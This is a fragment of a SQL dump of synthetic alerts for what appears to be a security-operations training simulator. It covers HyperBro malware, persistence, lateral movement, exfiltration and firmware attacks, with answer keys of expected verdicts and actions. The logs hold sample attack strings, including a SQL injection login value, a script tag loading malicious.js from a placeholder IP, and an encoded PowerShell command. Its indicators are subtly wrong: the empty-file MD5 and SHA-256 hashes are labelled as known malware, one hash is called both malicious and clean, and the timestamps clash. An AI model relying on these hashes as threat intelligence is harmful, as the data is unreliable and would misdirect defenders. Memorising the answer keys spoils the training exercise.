attacks\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://203.0.113.45/malicious.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious script\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"gov-portal.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Whitelist\",\"verdict\":\"clean\",\"details\":\"Legitimate government portal\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.465Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T09:15:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"referrer\\\":\\\"https://gov-portal.example.com\\\",\\\"malicious_script\\\":\\\"<script src=\'http://203.0.113.45/malicious.js\'></script>\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.js\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"evt-2023-1014-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.465Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T09:15:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"referrer\\\":\\\"https://gov-portal.example.com\\\",\\\"malicious_script\\\":\\\"<script 
src=\'http://203.0.113.45/malicious.js\'></script>\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.js\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"evt-2023-1014-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.465Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T09:15:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"referrer\\\":\\\"https://gov-portal.example.com\\\",\\\"malicious_script\\\":\\\"<script src=\'http://203.0.113.45/malicious.js\'></script>\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.js\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"evt-2023-1014-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.465Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T09:15:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"referrer\\\":\\\"https://gov-portal.example.com\\\",\\\"malicious_script\\\":\\\"<script 
src=\'http://203.0.113.45/malicious.js\'></script>\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.js\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"evt-2023-1014-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.465Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T09:15:32Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\",\\\"referrer\\\":\\\"https://gov-portal.example.com\\\",\\\"malicious_script\\\":\\\"<script src=\'http://203.0.113.45/malicious.js\'></script>\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.js\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"evt-2023-1014-0001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1178, 'HyperBro Malware Execution Attempt', 'high', 'Endpoint Detection and Response (EDR)', 'The EDR detected an attempt to execute the HyperBro malware on the endpoint. Upon visiting the compromised site, the user unwittingly downloaded the malware, allowing attackers to initiate control over the infected device.', 'Malware Execution', 'T1204.002 - User Execution: Malicious File', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"event_id\":\"3029\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"file_name\":\"setup.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"process_id\":\"4567\",\"event_type\":\"malware_execution\",\"url\":\"http://malicious-example.com/download\",\"action_taken\":\"quarantine\",\"detection_method\":\"behavioral_analysis\"}', '2026-02-07 21:22:02', '2026-02-23 11:17:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelFeed\",\"verdict\":\"malicious\",\"details\":\"Associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known HyperBro malware hash.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-example.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Malicious URL hosting 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"setup.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"Identified as a HyperBro payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1179, 'Establishing Persistence via Scheduled Task', 'high', 'System Logs', 'The attackers establish persistence on the compromised machines by creating a scheduled task that ensures HyperBro reloads even after system reboots. The task is configured to run at system start, executing a malicious script associated with the HyperBro RAT.', 'Persistence Mechanism', 'T1053.005', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"log_source\":\"Windows Event Log\",\"event_id\":106,\"level\":\"Information\",\"computer_name\":\"compromised-host\",\"user\":\"SYSTEM\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\UpdateTask\",\"task_action\":\"Create\",\"action_type\":\"Execute\",\"action_detail\":\"C:\\\\Windows\\\\Temp\\\\setup.exe\",\"task_parameters\":\"/c C:\\\\Windows\\\\Temp\\\\setup.exe\",\"attacker_ip\":\"203.0.113.45\",\"malware_hash\":\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\",\"internal_ip\":\"192.168.1.101\",\"username\":\"admin\"}', '2026-02-07 21:22:02', '2026-02-23 11:32:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C&C server associated with APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as HyperBro RAT payload.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Local administrator account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 
'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"log_source\\\":\\\"Windows Event Log\\\",\\\"event_id\\\":106,\\\"level\\\":\\\"Information\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_detail\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"task_parameters\\\":\\\"/c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"log_source\\\":\\\"Windows Event Log\\\",\\\"event_id\\\":106,\\\"level\\\":\\\"Information\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_detail\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"task_parameters\\\":\\\"/c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System 
event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"log_source\\\":\\\"Windows Event Log\\\",\\\"event_id\\\":106,\\\"level\\\":\\\"Information\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_detail\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"task_parameters\\\":\\\"/c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"log_source\\\":\\\"Windows Event Log\\\",\\\"event_id\\\":106,\\\"level\\\":\\\"Information\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_detail\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"task_parameters\\\":\\\"/c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"log_source\\\":\\\"Windows Event 
Log\\\",\\\"event_id\\\":106,\\\"level\\\":\\\"Information\\\",\\\"computer_name\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateTask\\\",\\\"task_action\\\":\\\"Create\\\",\\\"action_type\\\":\\\"Execute\\\",\\\"action_detail\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"task_parameters\\\":\\\"/c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\setup.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e3cbb8c2c1a4d3b9f1b2e7d4b4e5f6c7\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"admin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1180, 'Lateral Movement Detected within Network', 'high', 'Network Traffic Monitoring', 'Utilizing stolen credentials, the attackers move laterally across the network, accessing additional sensitive systems in search of valuable data. The detected traffic indicates unauthorized connections to multiple internal systems.', 'Network Intrusion', 'T1078: Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"destination_port\":3389,\"protocol\":\"RDP\",\"username\":\"jdoe\",\"event_type\":\"logon\",\"logon_type\":\"Network\",\"logon_status\":\"Success\",\"file_accessed\":\"\\\\\\\\192.168.1.15\\\\C$\\\\sensitive_data\\\\financial_report.xlsx\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_name\":\"explorer.exe\",\"additional_info\":\"Suspicious logon detected using stolen credentials for lateral movement.\"}', '2026-02-07 21:22:02', '2026-02-23 11:32:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Company internal server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"Account possibly compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"clean\",\"details\":\"No known malware associated with 
hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1181, 'Suspicious Data Exfiltration Activity', 'critical', 'Data Loss Prevention (DLP) Systems', 'In the final stage, attackers initiate data exfiltration, using encrypted channels to stealthily transfer collected intelligence out of the compromised network.', 'Data Exfiltration', 'T1048.003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T15:27:32Z\",\"event_type\":\"data_exfiltration\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"file_name\":\"sensitive_data_backup.zip\",\"file_hash\":\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\",\"bytes_sent\":104857600,\"exfiltration_channel\":\"encrypted_tunnel\",\"detection_method\":\"anomaly_detection_engine\"}', '2026-02-07 21:22:02', '2026-02-16 04:59:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_ip_reputation\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous data exfiltration incidents.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_data_backup.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Unusual file transfer detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"File hash not commonly seen in typical operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 
0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.485Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:27:32Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"file_hash\\\":\\\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\\\",\\\"bytes_sent\\\":104857600,\\\"exfiltration_channel\\\":\\\"encrypted_tunnel\\\",\\\"detection_method\\\":\\\"anomaly_detection_engine\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.485Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:27:32Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"file_hash\\\":\\\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\\\",\\\"bytes_sent\\\":104857600,\\\"exfiltration_channel\\\":\\\"encrypted_tunnel\\\",\\\"detection_method\\\":\\\"anomaly_detection_engine\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.485Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:27:32Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"file_hash\\\":\\\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\\\",\\\"bytes_sent\\\":104857600,\\\"exfiltration_channel\\\":\\\"encrypted_tunnel\\\",\\\"detection_method\\\":\\\"anomaly_detection_engine\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.485Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:27:32Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"file_hash\\\":\\\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\\\",\\\"bytes_sent\\\":104857600,\\\"exfiltration_channel\\\":\\\"encrypted_tunnel\\\",\\\"detection_method\\\":\\\"anomaly_detection_engine\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.485Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:27:32Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"file_hash\\\":\\\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\\\",\\\"bytes_sent\\\":104857600,\\\"exfiltration_channel\\\":\\\"encrypted_tunnel\\\",\\\"detection_method\\\":\\\"anomaly_detection_engine\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1182, 'Suspicious Firmware Update Detected', 'high', 'Network IDS/IPS logs', 'A suspicious firmware update was detected targeting a router. The update was initiated from an external IP address associated with the BlackTech APT group. The malicious firmware was identified by its hash, indicating it was designed to exploit vulnerabilities in Japanese and Taiwanese network devices.', 'Initial Access', 'T1190 - Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T02:15:36Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"event\":\"Malicious firmware update attempt\",\"firmware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"firmware_filename\":\"router_update_v2.bin\",\"detected_by\":\"Network IDS\",\"protocol\":\"HTTP\",\"request_url\":\"http://malicious-update.com/router_update_v2.bin\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-02-07 21:22:16', '2026-02-22 15:04:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP for BlackTech APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Associated with malicious firmware targeting routers\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-update.com/router_update_v2.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious firmware update\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 